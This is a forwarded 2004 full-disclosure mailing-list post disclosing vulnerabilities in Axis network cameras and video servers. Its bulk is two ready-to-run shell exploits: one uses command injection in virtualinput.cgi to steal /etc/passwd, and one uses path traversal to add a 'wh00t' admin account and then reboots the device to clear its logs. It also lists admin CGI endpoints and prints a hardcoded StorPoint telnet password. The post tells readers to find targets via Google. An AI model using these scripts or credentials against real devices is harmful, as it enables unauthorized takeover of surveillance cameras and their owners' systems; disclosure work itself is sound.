Nasty bug(s) found in Axis Network Camera/Video Servers

["Sullivan, Glenn" <gsullivan@xxxxxxxxxxxxxx>]

FYI...

I just received this on BugTraq, and I know a bunch of you use axis
cameras...

FYI...

Glenn Sullivan, MCSE+I  MCDBA
David Clark Company Inc.
-----Original Message-----
From: bashis [mailto:mcw@xxxxxxx]
Sent: Sunday, August 22, 2004 7:17 AM
To: full-disclosure@xxxxxxx
Cc: bugtraq@xxxxxxx
Subject: [PoC] Nasty bug(s) found in Axis Network Camera/Video Servers


/* Public disclosure due lack of responce from Axis Communications */

I have found a couple of bugs in Axis Network Camera/Video Servers.
(I have all Axis stuff in one e-mail, instead of multiple, lazy me.. ;)

Vulnerable: Axis 2100/2110/2120/2420/2130 Network Camera, 2400/2401
Video Server.
(There may be more devices vulnerable)

Included files (some is simple shell scripts):
axis-passwd.sh ........... Get /etc/passwd as 'anonymous viewer'
v2.34/2.40 axis-wh00t.sh ............ Add admin account as 'anonymous
viewer' v2.12-2.40 (whoops!) axis-cgi.txt ............. [bonus] Not so
mutch bugs here, but nice to know ;) axis-storpoint-cd-E100.txt [bonus]
Hardcoded l/p in Storepoint CD servers

Check each section for more details.

Quote of the day: Never say "whoops!", always say "Ah,
Interesting!"

Vendor,
Contacted:
>To: security@xxxxxxx
>Date: Mon, 16 Aug 2004 22:48:38 +0200 (CEST)

Status: No responce what so ever.
Fix/Workaround: None, v2.40 is the latest known version.
Url: http://www.axis.com/

Greets to people in #hack.se @EFnet.

Have a nice day
/bashis

----[ axis-passwd.sh ]----

#!/bin/sh
#
# Get /etc/passwd from:
# Axis 2100/2110/2120/2420 Network Camera 2.34/2.40 # AXIS 2130 PTZ
Network Camera # AXIS 2400/2401 Video Server # (There may be more
devices vulnerable) # # Problem:
#  PARAMETER=`echo $QUERY_STRING  sed 's/\(^.*\)=.*$/\1/'` # in
'virtualinput.cgi'
#
# Bug found and code by bashis <mcw+at+wcd.se> 2004-08 # Greets:
#hack.se @EFnet # # FAQ:
# Q: Where is the cam's?
# A: Google is your friend.
#
if [ ${#*} -ne 2 ]
then
printf "\nUsage: %s <ip> <port>\n\n" $0
exit 1
fi
#
printf "+++ Sending request to %s:%d\n+++ Received:\n" $1 $2
printf "GET
/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/h
tml/passwd\x60 HTTP/1.1\n\n"  nc $1 $2 printf "+++ Yeah, right..
for
you maybe, but not for me ;->\n\n+++ Get the passwd file now\n+++
Received:\n"
printf "GET /local/passwd HTTP/1.0\n\n"  nc $1 $2 printf
"\n+++ Thats
it.. Thanks for using Axis Airlines!\n"

----[ axis-wh00t.sh ]----

#!/bin/sh
#
# Add admin account with l/p: wh00t/wh00t # Axis 2100/2110/2120/2420
Network Camera 2.12-2.40 # AXIS 2130 PTZ Network Camera # AXIS 2400/2401
Video Server # (There may be more devices vulnerable) # # Problem:
#  POST action follows "/../"
#
# Bug found and code by bashis <mcw+at+wcd.se> 2004-08 # Greets:
#hack.se @EFnet # # 2.12 seems to very buggy version, it add wh00t
account, # but editcgi.cgi seems not to work..
#
# Yes, you can use 'editcgi.cgi' to edit /etc/passwd # and change/add
what you want, or browse around in filesystem.
#
# FAQ:
# Q: Where is the cam's?
# A: Google is your friend.
#
if [ ${#*} -ne 2 ]
then
printf "\nUsage: %s <ip> <port>\n\n" $0
exit 1
fi
#
printf "+++ Sending request to %s:%d\n" $1 $2 printf "+++ If
all went
well, you should see the password file soon...\n+++ Received:\n\n"
printf "POST /cgi-bin/scripts/../../this_server/ServerManager.srv
HTTP/1.0\nContent-Length: 250\nPragma:
no-cache\n\nconf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104
048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t
&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fa
dmin%%2Fsec_users.shtml&servermanager_do=set_variables\n"  nc $1
$2 >
/dev/null # Note.......^^^^^^^^^^^^^^^^^^^^^^ # printf "GET
/admin-bin/editcgi.cgi?file=/etc/passwd  HTTP/1.0\nHost:
127.0.0.1\nAuthorization: Basic d2gwMHQ6d2gwMHQ=\n\n"  nc $1 $2 # it's
good to clear logfile, so let us reboot the device now printf "GET
/cgi-bin/admin/restart.cgi HTTP/1.0\nAuthorization: Basic
d2gwMHQ6d2gwMHQ=\n\n"  nc $1 $2 > /dev/null printf "\n\n+++
You can
edit file(s) and browse around filesystem
with:\nhttp://$1/admin-bin/editcgi.cgi?file=\n";
printf "+++ Login with wh00t/wh00t (yes, you can edit
/etc/passwd)\n"
printf "\n+++ Thats it.. Thanks for using Axis Airlines!\n"

----[ axis-cgi.txt ]----

# Well, not so mutch bugs here, but nice to know.. ;) # # From version:
2.12 and newer.
# (All dosn't work with 2.12)
#

List all availible parameters.
> http://<device>/cgi-bin/admin/getparam.cgi
or
> http://<device>/cgi-bin/admin/getparam.cgi?root.Layout.OwnTitle

Set one parameter.
>
http://<device>/cgi-bin/admin/setparam.cgi?root.Layout.OwnTitle=Lame%2
> 0stuff

# Note, Axis is changing 'cgi-bin' to 'axis-cgi'
#
/cgi-bin/admin/systemlog.cgi      (show syslog)
/cgi-bin/admin/serverreport.cgi   (use[fullless] reports)
/cgi-bin/admin/restart.cgi        (restart device, also good to clear
syslog)
/cgi-bin/admin/paramlist.cgi      (get some config)
/cgi-bin/admin/getparam.cgi       (shown above)
/cgi-bin/admin/setparam.cgi       (shown above)
/cgi-bin/admin/factorydefault.cgi (hrmm.. ;)
/admin-bin/editcgi.cgi?file=      (browse filesystem, edit any file)

----[ axis-storpoint-cd-E100.txt ]----

# Yeah, old product.. old version.. but.. hardcoded l/p, uhm?
# l: copyright p: mammalambalouie
#
# Note, this hardcoded l/p exist in other products and newer versions #
of software as well, but i have not done so mutch research about this.

$ telnet xxx.xxx.xxx.xxx
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.

AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000

AXIS StorPoint CD E100 network login: copyright
Password: mammalambalouie

AXIS StorPoint CD E100 TELNET CD-ROM Server V5.30 Feb 29 2000

Root>
Root> q
Goodbye!
Connection closed by foreign host.
$
----